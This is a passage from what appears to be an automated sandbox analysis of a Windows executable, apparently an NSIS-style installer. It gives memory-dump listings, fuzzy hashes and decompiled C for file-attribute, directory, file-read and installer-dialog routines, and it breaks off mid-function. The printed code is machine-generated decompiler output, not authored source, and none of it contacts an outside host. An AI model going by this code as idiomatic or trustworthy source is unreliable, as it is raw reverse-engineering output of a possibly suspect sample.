Associated: 00000001.00000002.672311352.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.672319179.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.672348667.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.672358693.0000000000434000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.672378058.0000000000437000.00000002.00020000.sdmp Download File

Similarity

API ID: File$AttributesCreate
String ID:
API String ID: 415043291-0
Opcode ID: 5340b84021e5d080a0f841e0942d03c921a309eaf12029fe197c00c0f40f89c7
Instruction ID: e615d4ce70e2a600ad3370b8a7bf294de68ab1b424622093f8f4c5f34a5113e1
Opcode Fuzzy Hash: 5340b84021e5d080a0f841e0942d03c921a309eaf12029fe197c00c0f40f89c7
Instruction Fuzzy Hash: D5D09E31658301AFEF098F20DD1AF2EBBA2EB84B01F10962CB646940E0D6715C59DB16

Uniqueness

Uniqueness Score: -1.00%

Function 0040587F, Relevance: 3.0, APIs: 2, Instructions: 9
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040587F(CHAR* _a4) {
				signed char _t3;

				_t3 = GetFileAttributesA(_a4); // executed
				if(_t3 != 0xffffffff) {
					return SetFileAttributesA(_a4, _t3 & 0x000000fe);
				}
				return _t3;
			}

0x00405883
0x0040588c
0x00000000
0x00405895
0x0040589b

APIs

GetFileAttributesA.KERNELBASE(?,0040568A,?,?,?), ref: 00405883
SetFileAttributesA.KERNEL32(?,00000000), ref: 00405895

Memory Dump Source

Source File: 00000001.00000002.672287189.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.672282003.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.672311352.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.672319179.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.672348667.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.672358693.0000000000434000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.672378058.0000000000437000.00000002.00020000.sdmp Download File

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 526d85b860984864a1b6eb1eb54cd64df673d9b311570f6054ba349a806b51eb
Instruction ID: cb5a672fe6ba1e8618a417a0682e77d28f0f111bf9a29bd8adb2d3f05be15d2c
Opcode Fuzzy Hash: 526d85b860984864a1b6eb1eb54cd64df673d9b311570f6054ba349a806b51eb
Instruction Fuzzy Hash: FDC04C71C08501ABD6016B34EF0DC5F7B66EB50322B14CB35F469A01F0C7315C66DA2A

Uniqueness

Uniqueness Score: -1.00%

Function 004053F2, Relevance: 3.0, APIs: 2, Instructions: 9
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004053F2(CHAR* _a4) {
				int _t2;

				_t2 = CreateDirectoryA(_a4, 0); // executed
				if(_t2 == 0) {
					return GetLastError();
				}
				return 0;
			}

0x004053f8
0x00405400
0x00000000
0x00405406
0x00000000

APIs

CreateDirectoryA.KERNELBASE(?,00000000,0040311D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,?,004032B8), ref: 004053F8
GetLastError.KERNEL32 ref: 00405406

Memory Dump Source

Source File: 00000001.00000002.672287189.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.672282003.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.672311352.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.672319179.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.672348667.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.672358693.0000000000434000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.672378058.0000000000437000.00000002.00020000.sdmp Download File

Similarity

API ID: CreateDirectoryErrorLast
String ID:
API String ID: 1375471231-0
Opcode ID: e7d0addc6a0e2cebebc6ed5ef3cfbde17ba04572b5523194c914a84283870961
Instruction ID: 813393d6953da14087893f37eb662e151031eda4d181b9a341b076b840c4c01a
Opcode Fuzzy Hash: e7d0addc6a0e2cebebc6ed5ef3cfbde17ba04572b5523194c914a84283870961
Instruction Fuzzy Hash: 27C04C30619502DAD7105B31DD08B5B7E50AB50742F219535A506E11E1D6349492D93E

Uniqueness

Uniqueness Score: -1.00%

Function 004030B0, Relevance: 1.5, APIs: 1, Instructions: 22
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004030B0(void* _a4, long _a8) {
				int _t6;
				long _t10;

				_t10 = _a8;
				_t6 = ReadFile( *0x409014, _a4, _t10,  &_a8, 0); // executed
				if(_t6 == 0 || _a8 != _t10) {
					return 0;
				} else {
					return 1;
				}
			}

0x004030b4
0x004030c7
0x004030cf
0x00000000
0x004030d6
0x00000000
0x004030d8

APIs

ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,000000FF,?,00402EDD,000000FF,00000004,00000000,00000000,00000000), ref: 004030C7

Memory Dump Source

Source File: 00000001.00000002.672287189.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.672282003.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.672311352.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.672319179.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.672348667.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.672358693.0000000000434000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.672378058.0000000000437000.00000002.00020000.sdmp Download File

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 27fbe12f246225e3c312bde4903856853e362ca19ec2099a42773af8ab92d4e2
Instruction ID: 90557e19d7482b95f4dd5f96256efcc3496d5940ec1e4df6b8622c0cc682be59
Opcode Fuzzy Hash: 27fbe12f246225e3c312bde4903856853e362ca19ec2099a42773af8ab92d4e2
Instruction Fuzzy Hash: A1E08C32201118BBCF205E519D00AA73B9CEB043A2F008032BA18E51A0D630EA11ABA9

Uniqueness

Uniqueness Score: -1.00%

Function 004030E2, Relevance: 1.5, APIs: 1, Instructions: 6
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004030E2(long _a4) {
				long _t2;

				_t2 = SetFilePointer( *0x409014, _a4, 0, 0); // executed
				return _t2;
			}

0x004030f0
0x004030f6

APIs

SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402E1C,0000C1E4), ref: 004030F0

Memory Dump Source

Source File: 00000001.00000002.672287189.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.672282003.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.672311352.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.672319179.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.672348667.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.672358693.0000000000434000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.672378058.0000000000437000.00000002.00020000.sdmp Download File

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: b482a8c56bd79b67497ba547cc3d1d0f84b07fc9ac7ac5f50d4e9ed509354c89
Instruction ID: aafe5e0ddee8b519ffd98e4e857b28c3b9165386d483fecacc2863ad1570d206
Opcode Fuzzy Hash: b482a8c56bd79b67497ba547cc3d1d0f84b07fc9ac7ac5f50d4e9ed509354c89
Instruction Fuzzy Hash: D6B01231544200BFDB214F00DF06F057B21B79C701F208030B340380F082712430EB1E

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00404802, Relevance: 65.2, APIs: 33, Strings: 4, Instructions: 478
windowmemoryCOMMONCrypto

Download Yara Rule

C-Code - Quality: 98%

			E00404802(struct HWND__* _a4, int _a8, unsigned int _a12, int _a16) {
				struct HWND__* _v8;
				struct HWND__* _v12;
				signed int _v16;
				intOrPtr _v20;
				void* _v24;
				long _v28;
				int _v32;
				signed int _v40;
				int _v44;
				signed int* _v56;
				intOrPtr _v60;
				signed int _v64;
				long _v68;
				void* _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				void* _v84;
				void* __ebx;
				void* __edi;
				void* __esi;
				struct HWND__* _t182;
				intOrPtr _t183;
				int _t189;
				int _t196;
				intOrPtr _t198;
				long _t202;
				signed int _t206;
				signed int _t217;
				void* _t220;
				void* _t221;
				int _t227;
				intOrPtr _t231;
				signed int _t232;
				signed int _t233;
				signed int _t240;
				signed int _t242;
				signed int _t245;
				signed int _t247;
				struct HBITMAP__* _t250;
				void* _t252;
				char* _t268;
				signed char _t269;
				long _t274;
				int _t280;
				signed int* _t281;
				int _t282;
				long _t283;
				signed int* _t284;
				int _t285;
				long _t286;
				signed int _t287;
				long _t288;
				signed int _t291;
				int _t294;
				signed int _t298;
				signed int _t300;
				signed int _t302;
				intOrPtr _t309;
				int* _t310;
				void* _t311;
				int _t315;
				int _t316;
				int _t317;
				signed int _t318;
				void* _t320;
				void* _t328;
				void* _t331;

				_v12 = GetDlgItem(_a4, 0x3f9);
				_t182 = GetDlgItem(_a4, 0x408);
				_t280 =  *0x42ec48; // 0x765174
				_t320 = SendMessageA;
				_v8 = _t182;
				_t183 =  *0x42ec30; // 0x764fc8
				_t315 = 0;
				_v32 = _t280;
				_v20 = _t183 + 0x94;
				if(_a8 != 0x110) {
					L23:
					__eflags = _a8 - 0x405;
					if(_a8 != 0x405) {
						_t289 = _a16;
					} else {
						_a12 = _t315;
						_t289 = 1;
						_a8 = 0x40f;
						_a16 = 1;
					}
					__eflags = _a8 - 0x4e;
					if(_a8 == 0x4e) {
						L28:
						__eflags = _a8 - 0x413;
						_v16 = _t289;
						if(_a8 == 0x413) {
							L30:
							__eflags =  *0x42ec39 & 0x00000002;
							if(( *0x42ec39 & 0x00000002) != 0) {
								L41:
								__eflags = _v16 - _t315;
								if(_v16 != _t315) {
									_t232 = _v16;
									__eflags =  *((intOrPtr*)(_t232 + 8)) - 0xfffffe6e;
									if( *((intOrPtr*)(_t232 + 8)) == 0xfffffe6e) {
										SendMessageA(_v8, 0x419, _t315,  *(_t232 + 0x5c));
									}
									_t233 = _v16;
									__eflags =  *((intOrPtr*)(_t233 + 8)) - 0xfffffe6a;
									if( *((intOrPtr*)(_t233 + 8)) == 0xfffffe6a) {
										__eflags =  *((intOrPtr*)(_t233 + 0xc)) - 2;
										if( *((intOrPtr*)(_t233 + 0xc)) != 2) {
											_t284 =  *(_t233 + 0x5c) * 0x418 + _t280 + 8;
											 *_t284 =  *_t284 & 0xffffffdf;
											__eflags =  *_t284;
										} else {
											 *( *(_t233 + 0x5c) * 0x418 + _t280 + 8) =  *( *(_t233 + 0x5c) * 0x418 + _t280 + 8) | 0x00000020;
										}
									}
								}
								goto L48;
							}
							__eflags = _a8 - 0x413;
							if(_a8 == 0x413) {
								L33:
								__eflags = _a8 - 0x413;
								_t289 = 0 | _a8 != 0x00000413;
								_t240 = E00404782(_v8, _a8 != 0x413);
								__eflags = _t240 - _t315;
								if(_t240 >= _t315) {
									_t93 = _t280 + 8; // 0x8
									_t310 = _t240 * 0x418 + _t93;
									_t289 =  *_t310;
									__eflags = _t289 & 0x00000010;
									if((_t289 & 0x00000010) == 0) {
										__eflags = _t289 & 0x00000040;
										if((_t289 & 0x00000040) == 0) {
											_t298 = _t289 ^ 0x00000001;
											__eflags = _t298;
										} else {
											_t300 = _t289 ^ 0x00000080;
											__eflags = _t300;
											if(_t300 >= 0) {
												_t298 = _t300 & 0xfffffffe;
											} else {
												_t298 = _t300 | 0x00000001;
											}
										}
										 *_t310 = _t298;
										E0040117D(_t240);
										_t242 =  *0x42ec38; // 0x80
										_t289 = 1;
										_a8 = 0x40f;
										_t245 =  !_t242 >> 0x00000008 & 1;
										__eflags = _t245;
										_a12 = 1;
										_a16 = _t245;
									}
								}
								goto L41;
							}
							_t289 = _a16;
							__eflags =  *((intOrPtr*)(_t289 + 8)) - 0xfffffffe;
							if( *((intOrPtr*)(_t289 + 8)) != 0xfffffffe) {
								goto L41;
							}
							goto L33;
						}
						__eflags =  *((intOrPtr*)(_t289 + 4)) - 0x408;
						if( *((intOrPtr*)(_t289 + 4)) != 0x408) {
							goto L48;
						}
						goto L30;
					} else {
						__eflags = _a8 - 0x413;
						if(_a8 != 0x413) {
							L48:
							__eflags = _a8 - 0x111;
							if(_a8 != 0x111) {
								L56:
								__eflags = _a8 - 0x200;
								if(_a8 == 0x200) {
									SendMessageA(_v8, 0x200, _t315, _t315);
								}
								__eflags = _a8 - 0x40b;
								if(_a8 == 0x40b) {
									_t220 =  *0x42a07c;
									__eflags = _t220 - _t315;
									if(_t220 != _t315) {
										ImageList_Destroy(_t220);
									}
									_t221 =  *0x42a094;
									__eflags = _t221 - _t315;
									if(_t221 != _t315) {
										GlobalFree(_t221);
									}
									 *0x42a07c = _t315;
									 *0x42a094 = _t315;
									 *0x42ec80 = _t315;
								}
								__eflags = _a8 - 0x40f;
								if(_a8 != 0x40f) {
									L86:
									__eflags = _a8 - 0x420;
									if(_a8 == 0x420) {
										__eflags =  *0x42ec39 & 0x00000001;
										if(( *0x42ec39 & 0x00000001) != 0) {
											__eflags = _a16 - 0x20;
											_t189 = (0 | _a16 == 0x00000020) << 3;
											__eflags = _t189;
											_t316 = _t189;
											ShowWindow(_v8, _t316);
											ShowWindow(GetDlgItem(_a4, 0x3fe), _t316);
										}
									}
									goto L89;
								} else {
									E004011EF(_t289, _t315, _t315);
									__eflags = _a12 - _t315;
									if(_a12 != _t315) {
										E0040140B(8);
									}
									__eflags = _a16 - _t315;
									if(_a16 == _t315) {
										L73:
										E004011EF(_t289, _t315, _t315);
										__eflags =  *0x42ec4c - _t315; // 0x3
										_v32 =  *0x42a094;
										_t196 =  *0x42ec48; // 0x765174
										_v60 = 0xf030;
										_v16 = _t315;
										if(__eflags <= 0) {
											L84:
											InvalidateRect(_v8, _t315, 1);
											_t198 =  *0x42e3fc; // 0x76c0c0
											__eflags =  *((intOrPtr*)(_t198 + 0x10)) - _t315;
											if( *((intOrPtr*)(_t198 + 0x10)) != _t315) {
												E0040473D(0x3ff, 0xfffffffb, E00404755(5));
											}
											goto L86;
										} else {
											_t142 = _t196 + 8; // 0x76517c
											_t281 = _t142;
											do {
												_t202 =  *((intOrPtr*)(_v32 + _v16 * 4));
												__eflags = _t202 - _t315;
												if(_t202 != _t315) {
													_t291 =  *_t281;
													_v68 = _t202;
													__eflags = _t291 & 0x00000001;
													_v72 = 8;
													if((_t291 & 0x00000001) != 0) {
														_t151 =  &(_t281[4]); // 0x76518c
														_v72 = 9;
														_v56 = _t151;
														_t154 =  &(_t281[0]);
														 *_t154 = _t281[0] & 0x000000fe;
														__eflags =  *_t154;
													}
													__eflags = _t291 & 0x00000040;
													if((_t291 & 0x00000040) == 0) {
														_t206 = (_t291 & 0x00000001) + 1;
														__eflags = _t291 & 0x00000010;
														if((_t291 & 0x00000010) != 0) {
															_t206 = _t206 + 3;
															__eflags = _t206;
														}
													} else {
														_t206 = 3;
													}
													_t294 = (_t291 >> 0x00000005 & 0x00000001) + 1;
													__eflags = _t294;
													_v64 = (_t206 << 0x0000000b | _t291 & 0x00000008) + (_t206 << 0x0000000b | _t291 & 0x00000008) | _t291 & 0x00000020;
													SendMessageA(_v8, 0x1102, _t294, _v68);
													SendMessageA(_v8, 0x110d, _t315,  &_v72);
												}
												_v16 = _v16 + 1;
												_t281 =  &(_t281[0x106]);
												__eflags = _v16 -  *0x42ec4c; // 0x3
											} while (__eflags < 0);
											goto L84;
										}
									} else {
										_t282 = E004012E2( *0x42a094);
										E00401299(_t282);
										_t217 = 0;
										_t289 = 0;
										__eflags = _t282 - _t315;
										if(_t282 <= _t315) {
											L72:
											SendMessageA(_v12, 0x14e, _t289, _t315);
											_a16 = _t282;
											_a8 = 0x420;
											goto L73;
										} else {
											goto L69;
										}
										do {
											L69:
											_t309 = _v20;
											__eflags =  *((intOrPtr*)(_t309 + _t217 * 4)) - _t315;
											if( *((intOrPtr*)(_t309 + _t217 * 4)) != _t315) {
												_t289 = _t289 + 1;
												__eflags = _t289;
											}
											_t217 = _t217 + 1;
											__eflags = _t217 - _t282;
										} while (_t217 < _t282);
										goto L72;
									}
								}
							}
							__eflags = _a12 - 0x3f9;
							if(_a12 != 0x3f9) {
								goto L89;
							}
							__eflags = _a12 >> 0x10 - 1;
							if(_a12 >> 0x10 != 1) {
								goto L89;
							}
							_t227 = SendMessageA(_v12, 0x147, _t315, _t315);
							__eflags = _t227 - 0xffffffff;
							if(_t227 == 0xffffffff) {
								goto L89;
							}
							_t283 = SendMessageA(_v12, 0x150, _t227, _t315);
							__eflags = _t283 - 0xffffffff;
							if(_t283 == 0xffffffff) {
								L54:
								_t283 = 0x20;
								L55:
								E00401299(_t283);
								SendMessageA(_a4, 0x420, _t315, _t283);
								_a12 = 1;
								_a16 = _t315;
								_a8 = 0x40f;
								goto L56;
							}
							_t231 = _v20;
							__eflags =  *((intOrPtr*)(_t231 + _t283 * 4)) - _t315;
							if( *((intOrPtr*)(_t231 + _t283 * 4)) != _t315) {
								goto L55;
							}
							goto L54;
						}
						goto L28;
					}
				} else {
					 *0x42ec80 = _a4;
					_t247 =  *0x42ec4c; // 0x3
					_t285 = 2;
					_v28 = 0;
					_v16 = _t285;
					 *0x42a094 = GlobalAlloc(0x40, _t247 << 2);
					_t250 = LoadBitmapA( *0x42ec20, 0x6e);
					 *0x42a088 =  *0x42a088 | 0xffffffff;
					_v24 = _t250;
					 *0x42a090 = SetWindowLongA(_v8, 0xfffffffc, E00404E03);
					_t252 = ImageList_Create(0x10, 0x10, 0x21, 6, 0);
					 *0x42a07c = _t252;
					ImageList_AddMasked(_t252, _v24, 0xff00ff);
					SendMessageA(_v8, 0x1109, _t285,  *0x42a07c);
					if(SendMessageA(_v8, 0x111c, 0, 0) < 0x10) {
						SendMessageA(_v8, 0x111b, 0x10, 0);
					}
					DeleteObject(_v24);
					_t286 = 0;
					do {
						_t258 =  *((intOrPtr*)(_v20 + _t286 * 4));
						if( *((intOrPtr*)(_v20 + _t286 * 4)) != _t315) {
							if(_t286 != 0x20) {
								_v16 = _t315;
							}
							SendMessageA(_v12, 0x151, SendMessageA(_v12, 0x143, _t315, E00405BE9(_t286, _t315, _t320, _t315, _t258)), _t286);
						}
						_t286 = _t286 + 1;
					} while (_t286 < 0x21);
					_t317 = _a16;
					_t287 = _v16;
					_push( *((intOrPtr*)(_t317 + 0x30 + _t287 * 4)));
					_push(0x15);
					E00403E83(_a4);
					_push( *((intOrPtr*)(_t317 + 0x34 + _t287 * 4)));
					_push(0x16);
					E00403E83(_a4);
					_t318 = 0;
					_t288 = 0;
					_t328 =  *0x42ec4c - _t318; // 0x3
					if(_t328 <= 0) {
						L19:
						SetWindowLongA(_v8, 0xfffffff0, GetWindowLongA(_v8, 0xfffffff0) & 0x000000fb);
						goto L20;
					} else {
						_t311 = _v32 + 8;
						_v24 = _t311;
						do {
							_t268 = _t311 + 0x10;
							if( *_t268 != 0) {
								_v60 = _t268;
								_t269 =  *_t311;
								_t302 = 0x20;
								_v84 = _t288;
								_v80 = 0xffff0002;
								_v76 = 0xd;
								_v64 = _t302;
								_v40 = _t318;
								_v68 = _t269 & _t302;
								if((_t269 & 0x00000002) == 0) {
									__eflags = _t269 & 0x00000004;
									if((_t269 & 0x00000004) == 0) {
										 *( *0x42a094 + _t318 * 4) = SendMessageA(_v8, 0x1100, 0,  &_v84);
									} else {
										_t288 = SendMessageA(_v8, 0x110a, 3, _t288);
									}
								} else {
									_v76 = 0x4d;
									_v44 = 1;
									_t274 = SendMessageA(_v8, 0x1100, 0,  &_v84);
									_v28 = 1;
									 *( *0x42a094 + _t318 * 4) = _t274;
									_t288 =  *( *0x42a094 + _t318 * 4);
								}
							}
							_t318 = _t318 + 1;
							_t311 = _v24 + 0x418;
							_t331 = _t318 -  *0x42ec4c; // 0x3
							_v24 = _t311;
						} while (_t331 < 0);
						if(_v28 != 0) {
							L20:
							if(_v16 != 0) {
								E00403EB8(_v8);
								_t280 = _v32;
								_t315 = 0;
								__eflags = 0;
								goto L23;
							} else {
								ShowWindow(_v12, 5);
								E00403EB8(_v12);
								L89:
								return E00403EEA(_a8, _a12, _a16);
							}
						}
						goto L19;
					}
				}
			}

0x00404820
0x00404826
0x00404828
0x0040482e
0x00404834
0x00404837
0x00404841
0x0040484a
0x0040484d
0x00404850
0x00404a78
0x00404a78
0x00404a7f
0x00404a93
0x00404a81
0x00404a83
0x00404a86
0x00404a87
0x00404a8e
0x00404a8e
0x00404a96
0x00404a9f
0x00404aaa
0x00404aaa
0x00404aad
0x00404ab0
0x00404abf
0x00404abf
0x00404ac6
0x00404b3e
0x00404b3e
0x00404b41
0x00404b43
0x00404b46
0x00404b4d
0x00404b5b
0x00404b5b
0x00404b5d
0x00404b60
0x00404b67
0x00404b69
0x00404b6d
0x00404b8a
0x00404b8e
0x00404b8e
0x00404b6f
0x00404b7c
0x00404b7c
0x00404b6d
0x00404b67
0x00000000
0x00404b41
0x00404ac8
0x00404acb
0x00404ad6
0x00404ad8
0x00404adb
0x00404ae2
0x00404ae7
0x00404ae9
0x00404af3
0x00404af3
0x00404af7
0x00404af9
0x00404afc
0x00404afe
0x00404b01
0x00404b17
0x00404b17
0x00404b03
0x00404b03
0x00404b09
0x00404b0b
0x00404b12
0x00404b0d
0x00404b0d
0x00404b0d
0x00404b0b
0x00404b1b
0x00404b1d
0x00404b22
0x00404b2b
0x00404b2c
0x00404b36
0x00404b36
0x00404b38
0x00404b3b
0x00404b3b
0x00404afc
0x00000000
0x00404ae9
0x00404acd
0x00404ad0
0x00404ad4
0x00000000
0x00000000
0x00000000
0x00404ad4
0x00404ab2
0x00404ab9
0x00000000
0x00000000
0x00000000
0x00404aa1
0x00404aa1
0x00404aa4
0x00404b91
0x00404b91
0x00404b98
0x00404c0c
0x00404c0c
0x00404c13
0x00404c1f
0x00404c1f
0x00404c21
0x00404c28
0x00404c2a
0x00404c2f
0x00404c31
0x00404c34
0x00404c34
0x00404c3a
0x00404c3f
0x00404c41
0x00404c44
0x00404c44
0x00404c4a
0x00404c50
0x00404c56
0x00404c56
0x00404c5c
0x00404c63
0x00404db0
0x00404db0
0x00404db7
0x00404db9
0x00404dc0
0x00404dc4
0x00404dd1
0x00404dd1
0x00404dd4
0x00404dda
0x00404dec
0x00404dec
0x00404dc0
0x00000000
0x00404c69
0x00404c6b
0x00404c70
0x00404c73
0x00404c77
0x00404c77
0x00404c7c
0x00404c7f
0x00404cc0
0x00404cc2
0x00404ccc
0x00404cd2
0x00404cd5
0x00404cda
0x00404ce1
0x00404ce4
0x00404d86
0x00404d8c
0x00404d92
0x00404d97
0x00404d9a
0x00404dab
0x00404dab
0x00000000
0x00404cea
0x00404cea
0x00404cea
0x00404ced
0x00404cf3
0x00404cf6
0x00404cf8
0x00404cfa
0x00404cfc
0x00404cff
0x00404d02
0x00404d09
0x00404d0b
0x00404d0e
0x00404d15
0x00404d18
0x00404d18
0x00404d18
0x00404d18
0x00404d1c
0x00404d1f
0x00404d2b
0x00404d2c
0x00404d2f
0x00404d31
0x00404d31
0x00404d31
0x00404d21
0x00404d23
0x00404d23
0x00404d50
0x00404d50
0x00404d51
0x00404d5d
0x00404d6c
0x00404d6c
0x00404d6e
0x00404d71
0x00404d7a
0x00404d7a
0x00000000
0x00404ced
0x00404c81
0x00404c8c
0x00404c8f
0x00404c94
0x00404c96
0x00404c98
0x00404c9a
0x00404caa
0x00404cb4
0x00404cb6
0x00404cb9
0x00000000
0x00000000
0x00000000
0x00000000
0x00404c9c
0x00404c9c
0x00404c9c
0x00404c9f
0x00404ca2
0x00404ca4
0x00404ca4
0x00404ca4
0x00404ca5
0x00404ca6
0x00404ca6
0x00000000
0x00404c9c
0x00404c7f
0x00404c63
0x00404b9a
0x00404ba0
0x00000000
0x00000000
0x00404bac
0x00404bb0
0x00000000
0x00000000
0x00404bc0
0x00404bc2
0x00404bc5
0x00000000
0x00000000
0x00404bd7
0x00404bd9
0x00404bdc
0x00404be6
0x00404be8
0x00404be9
0x00404bea
0x00404bf9
0x00404bfb
0x00404c02
0x00404c05
0x00000000
0x00404c05
0x00404bde
0x00404be1
0x00404be4
0x00000000
0x00000000
0x00000000
0x00404be4
0x00000000
0x00404aa4
0x00404856
0x0040485b
0x00404860
0x00404865
0x00404866
0x0040486f
0x0040487a
0x00404885
0x0040488b
0x00404899
0x004048ae
0x004048b3
0x004048be
0x004048c7
0x004048dc
0x004048ed
0x004048fa
0x004048fa
0x004048ff
0x00404905
0x00404907
0x0040490a
0x0040490f
0x00404914
0x00404916
0x00404916
0x00404936
0x00404936
0x00404938
0x00404939
0x0040493e
0x00404941
0x00404944
0x00404948
0x0040494d
0x00404952
0x00404956
0x0040495b
0x00404960
0x00404962
0x00404964
0x0040496a
0x00404a34
0x00404a47
0x00000000
0x00404970
0x00404973
0x00404976
0x00404979
0x00404979
0x0040497f
0x00404985
0x00404988
0x0040498e
0x0040498f
0x00404994
0x0040499d
0x004049a4
0x004049a7
0x004049aa
0x004049ad
0x004049e7
0x004049e9
0x00404a12
0x004049eb
0x004049f8
0x004049f8
0x004049af
0x004049b2
0x004049c1
0x004049cb
0x004049d3
0x004049da
0x004049e2
0x004049e2
0x004049ad
0x00404a18
0x00404a19
0x00404a1f
0x00404a25
0x00404a25
0x00404a32
0x00404a4d
0x00404a51
0x00404a6e
0x00404a73
0x00404a76
0x00404a76
0x00000000
0x00404a53
0x00404a58
0x00404a61
0x00404dee
0x00404e00
0x00404e00
0x00404a51
0x00000000
0x00404a32
0x0040496a

APIs

GetDlgItem.USER32 ref: 00404819
GetDlgItem.USER32 ref: 00404826
GlobalAlloc.KERNEL32(00000040,00000003), ref: 00404872
LoadBitmapA.USER32 ref: 00404885
SetWindowLongA.USER32 ref: 0040489F
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 004048B3
ImageList_AddMasked.COMCTL32(00000000,?,00FF00FF), ref: 004048C7
SendMessageA.USER32(?,00001109,00000002), ref: 004048DC
SendMessageA.USER32(?,0000111C,00000000,00000000), ref: 004048E8
SendMessageA.USER32(?,0000111B,00000010,00000000), ref: 004048FA
DeleteObject.GDI32(?), ref: 004048FF
SendMessageA.USER32(?,00000143,00000000,00000000), ref: 0040492A
SendMessageA.USER32(?,00000151,00000000,00000000), ref: 00404936
SendMessageA.USER32(?,00001100,00000000,?), ref: 004049CB
SendMessageA.USER32(?,0000110A,00000003,00000000), ref: 004049F6
SendMessageA.USER32(?,00001100,00000000,?), ref: 00404A0A
GetWindowLongA.USER32 ref: 00404A39
SetWindowLongA.USER32 ref: 00404A47
ShowWindow.USER32(?,00000005), ref: 00404A58
SendMessageA.USER32(?,00000419,00000000,?), ref: 00404B5B
SendMessageA.USER32(?,00000147,00000000,00000000), ref: 00404BC0
SendMessageA.USER32(?,00000150,00000000,00000000), ref: 00404BD5
SendMessageA.USER32(?,00000420,00000000,00000020), ref: 00404BF9
SendMessageA.USER32(?,00000200,00000000,00000000), ref: 00404C1F
ImageList_Destroy.COMCTL32(?), ref: 00404C34
GlobalFree.KERNEL32 ref: 00404C44
SendMessageA.USER32(?,0000014E,00000000,00000000), ref: 00404CB4
SendMessageA.USER32(?,00001102,00000410,?), ref: 00404D5D
SendMessageA.USER32(?,0000110D,00000000,00000008), ref: 00404D6C
InvalidateRect.USER32(?,00000000,00000001), ref: 00404D8C
ShowWindow.USER32(?,00000000), ref: 00404DDA
GetDlgItem.USER32 ref: 00404DE5
ShowWindow.USER32(00000000), ref: 00404DEC

Strings

tQv, xrefs: 00404828, 00404CD5
, xrefs: 00404DC4
M, xrefs: 004049B2
N, xrefs: 00404A96

Memory Dump Source

Source File: 00000001.00000002.672287189.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.672282003.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.672311352.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.672319179.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.672348667.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.672358693.0000000000434000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.672378058.0000000000437000.00000002.00020000.sdmp Download File

Similarity

API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
String ID: $M$N$tQv
API String ID: 1638840714-562565097
Opcode ID: 03cda6e4da2b8fb4d01f8465d39c3ee25f13877e52dcc6e8ff3e3942391822dc
Instruction ID: 6f0a98d5dd10ef4145f29f69d97320cca22844812bd755e22afdd9aff1593a00
Opcode Fuzzy Hash: 03cda6e4da2b8fb4d01f8465d39c3ee25f13877e52dcc6e8ff3e3942391822dc
Instruction Fuzzy Hash: A702B1B0A00209EFEB25CF95DD45AAE7BB5FB84314F10413AF610BA2E1C7799A41CF58

Uniqueness

Uniqueness Score: -1.00%

Function 00404FF1, Relevance: 65.0, APIs: 36, Strings: 1, Instructions: 278
windowclipboardmemoryCOMMON

Download Yara Rule

C-Code - Quality: 96%

			E00404FF1(struct HWND__* _a4, long _a8, long _a12, unsigned int _a16) {
				struct HWND__* _v8;
				long _v12;
				struct tagRECT _v28;
				void* _v36;
				signed int _v40;
				int _v44;
				int _v48;
				signed int _v52;
				int _v56;
				void* _v60;
				void* _v68;
				void* __ebx;
				void* __edi;
				void* __esi;
				long _t87;
				unsigned int _t92;
				unsigned int _t93;
				int _t94;
				int _t95;
